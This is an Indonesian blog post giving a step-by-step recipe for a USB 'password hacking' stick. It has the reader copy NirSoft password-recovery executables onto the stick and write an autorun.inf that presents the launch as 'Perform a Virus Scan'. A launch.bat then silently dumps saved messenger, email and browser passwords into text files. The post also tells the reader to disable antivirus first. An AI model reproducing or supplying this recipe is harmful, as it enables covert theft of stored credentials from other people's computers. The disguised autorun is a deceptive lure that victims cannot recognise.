Photobucket
Home » Menjadikan Flashdisk menjadi alat Pembobol password

Menjadikan Flashdisk menjadi alat Pembobol password

Briliant, and simpel, td ini aq temuin waktu lg browsing

Ada sejumlah tools yang berfungsi merecovery (memulihkan) password dari file tempatnya di simpan dengan memanfaatkan USB flashdisk. Anda dapat membuat rootkit Anda sendiri untuk meng-hack password. berikut ini sejumlah tools untuk Menjadikan flashdisk menjadi alat hack password :

MessenPass : piranti recover password yang paling populer untuk Program Instant Messenger seperti: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger, Trillian, Miranda, dan Gaim.

Mail PassView : merecovery password dari program email seperti: Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird dan Group Mail Gratis lainnya.

IE Passview : adalah utilitas sederhana yang bisa merecovery password dari browser Internet Explorer. Versi ini mendukung Internet Explorer 7.0, serta versi Internet explorer, v4.0 – v6.0.

Protected Storage PassView : merecovery semua password yang tersimpan dalam Protected Storage, termasuk AutoComplete password Internet Explorer, password dari situs yang dilindungi sandi, MSN Explorer Sandi, dan masih banyak lagi …

PasswordFox : PasswordFox adalah utilitas pemulihan password sederhana yang memungkinkan anda melihat nama pengguna dan sandi yang disimpan oleh browser Mozilla Firefox. Secara default, PasswordFox menampilkan password yang disimpan dalam profil aktif Anda, tetapi Anda dapat dengan mudah memilih untuk melihat password Firefox di lain profil.

Berikut adalah langkah demi langkah untuk menciptakan procedure password hacking toolkit dalam USB Drive (Flashdisk):

CATATAN: Anda harus menonaktifkan sementara antivirus Anda sebelum mengikuti langkah-langkah ini.

1. Download dan ekstrak ke 5 tools di atas dan copy file executable (Exe file) saja ke Flashdisk yaitu: Salinlah file – mspass.exe, mailpv.exe, iepv.exe, pspv.exe dan passwordfox.exe ke dalam USB Drive.

2. Buat file Notepad baru dan dan ketik teks berikut ini :
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

3. Simpan Notepad and rename dari New Text Document.txt menjadi autorun.inf, lalu
copy file autorun.inf ke dalam USB drive.

4. Buat file Notepad baru lagi dan ketik teks berikut :
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

5. Simpan file Notepad and gantilah namanya dari New Text Document.txt menjadi launch.bat, lalu Salin file launch.bat USB drive Anda.

Sekarang rootkit Anda sudah siap di gunakan untuk hack password. Namun, tools Hack ini akan bekerja pada Windows 2000, XP, Vista dan 7 serta akan memulihkan password jika ada password yang tersimpan dalam computer.

Cara menggunakan flashdisk hack tools sebagai berikut :

1. Masukkan flashdisk ke USB Port dan jendela pop-up autorun akan tampil. (Hal ini karena, ada telah menciptakan sebuah autorun di flashdisk).

2. Pada jendela pop-up, pilih pilihan pertama (melakukan scan Virus).

3. Sekarang, semua hacking tools password berjalan secara diam-diam di belakang layar. Proses ini memakan waktu tidak terlalu lama. Password yang di temukan akan di recover untuk selanjutnya disimpan dalam sebuah file TXT.

4. Keluarkan flashdisk dan Anda akan melihat password yang tersimpan dalam format TXT file.Ü



reff http://trikstips.wordpress.com

1 komentar:

Anonim mengatakan...

Tutorial menjalankan Game ps2 DVD, ISO,NRG di pc/laptop lengkap
Disini
Terimakasih

Posting Komentar

Buku Tamu

Mengutip sebagian atau keseluruhan isi blog ini ke blog Anda dipersilahkan ASAL menyebut URL sumber tulisan dan/atau permanent link artikel yg dikutip.

-------------Blog ini dofollow-----------

Tinggal kan Komentar otomatis mendapatkan backlink dari saya dan dari para pengunjung disini,Terima Kasih Telah Berkunjung.

 
Download